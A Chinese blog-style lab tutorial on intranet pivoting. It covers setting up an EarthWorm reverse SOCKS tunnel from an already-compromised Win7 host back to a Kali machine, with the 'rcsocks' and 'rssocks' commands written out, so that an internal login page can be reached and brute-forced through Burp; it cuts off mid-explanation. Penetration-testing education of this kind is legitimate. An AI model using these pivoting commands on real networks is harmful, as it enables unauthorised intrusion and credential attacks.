内网穿透抓包

提出问题: 通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢?如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢?

一、实验环境

二、实验工具

Earthworm:下载地址:http://rootkiter.com/EarthWorm/

三、操作步骤

首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。

知识点:

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端。
反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端。

一般当有防火墙过滤时,正向连接无法建立时,尝使用反向代理的方式将目标机器的流量代理出来,所以这里就用到了代理中的大杀器EW。

EW关于代理的部分知识也很简单,这里不对其所有的代理方法进行介绍,只对反向代理中用到的部分进行阐述。

Kali:./ew_for_linux64 -s rcsocks -l 1080 -e 8880

该命令是将本地1080端口的流量走向本地8880端口

Win7靶机:ew.exe -s rssocks -d 172.17.60.226 -e 8880

该命令是将Win7

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值